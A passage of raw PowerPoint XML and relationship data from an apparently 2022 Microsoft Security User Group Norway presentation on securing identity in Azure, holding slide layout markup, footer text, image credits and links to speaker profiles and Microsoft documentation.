            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="73950" y="5962808"/>
            <a:ext cx="893790" cy="895192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4C11AE-FC43-4D28-9F7C-CAE1A33E7371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359566" y="6574931"/>
            <a:ext cx="3284874"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noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>©2022 Microsoft Security User Group Norway All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8281ED09-5C7E-4425-A394-9BA447C8A189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591"/>
            <a:ext cx="612668" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D78E4FD-96FB-45DC-B234-DA96293CAC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="1096775" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F566C4-94A0-44DB-88B6-51620ABCF960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593230" y="6306486"/>
            <a:ext cx="1063112" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>msugn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D934E5A-E5A7-4526-A806-D553111F1ACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" cstate="print">
            <a:alphaModFix amt="69000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516712" y="6523366"/>
            <a:ext cx="124142" cy="124142"/>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E9C0D8A6-34C2-488E-95FB-8CD7908FC050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print">
            <a:alphaModFix amt="58000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10508139" y="6360073"/>
            <a:ext cx="141339" cy="141339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270913250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A289ED-9384-4FD8-8FDB-2F648F0C50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ECDB63-D975-41DE-B9FF-A2FB5C83D1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BBECB48-FD42-4C38-9C21-22753FD63B9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11594437" y="6388775"/>
            <a:ext cx="52361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FBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF291514-9A8A-45FB-B653-501D3EF881C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074420" y="6571338"/>
            <a:ext cx="3733800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7175D263-F080-4A2E-B21E-FA2C306FF33D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2F4164-70F9-4964-884C-0A05063DC21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="73950" y="5962808"/>
            <a:ext cx="893790" cy="895192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712F8DA0-C8EB-4087-8A49-F08B926AB541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359566" y="6574931"/>
            <a:ext cx="3284874" cy="2308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noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>©2022 Microsoft Security User Group Norway All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD29820B-1933-49D4-95A4-5F0F4013AEE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591"/>
            <a:ext cx="612668" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3037A7E1-5650-4793-B943-7F926D7E6B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="1096775" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5242DD6E-A457-420F-8FB7-D1546F6D90E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593230" y="6306486"/>
            <a:ext cx="1063112" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>msugn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A405BF-20EB-4495-BBE1-6A451E9B58E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18" cstate="print">
            <a:alphaModFix amt="69000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516712" y="6523366"/>
            <a:ext cx="124142" cy="124142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="Shape&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC80515F-44BF-466D-B07A-E02A77DD8975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19" cstate="print">
            <a:alphaModFix amt="58000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10508139" y="6360073"/>
            <a:ext cx="141339" cy="141339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6561681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228928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msugn/events" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freepik.com/vectors/hacker-hacking"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hyperlink" Target="https://www.techegg.net/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpe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hyperlink" Target="https://www.linkedin.com/in/craig4shaw/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/haflidif/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/craig_forsh" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/haflidif" TargetMode="External"/><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hyperlink" Target="https://medium.com/@chumworth"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active-directory/privileged-identity-management/pim-configur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blog.une.edu.au/library/2018/10/26/the-why-and-how-of-referencing-source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active-directory/roles/permissions-reference?msclkid=325ea78bc00711ec893b2351d9059272" TargetMode="External"/><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https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles?msclkid=448fdd6fc00711ecaa0781017557a47f"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www.flaticon.com/free-stickers/pizza"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ithub.com/msugn/events" TargetMode="Externa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27.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msandbu.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/marius-sandbu-a2b0141b/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/msandbu" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.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35.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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35.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.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22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SwiftOnSecurity/sysmon-config" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bit.ly/3vclP4d"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27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.emf"/></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36.xml"/><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31.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/><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emf"/><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546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458F3-3980-4F2C-8864-0742E07264D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362236" y="2766218"/>
            <a:ext cx="3076254" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="929590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058" name="Rectangle 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB1B515-F9F4-43DB-9558-A4C5ABBBF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tel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7978004" y="945034"/>
            <a:ext cx="3788936" cy="3676842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Securing Identity in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Azure native world</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2059" name="Rectangle 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C9528F-903F-4F75-99E3-CC588843E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Hacker hacking vector created by catalyststuff - www.freepik.com&#10;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8180110-5B7B-4F91-A8ED-DBC5413B97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1704" y="467255"/>
            <a:ext cx="5330536" cy="5330536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22634EF-EF39-4659-BCBC-603F005CB701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72736" y="6546981"/>
            <a:ext cx="6643947" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Hacker hacking vector created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>catalyststuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> - www.freepik.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54">
            <a:extLst>
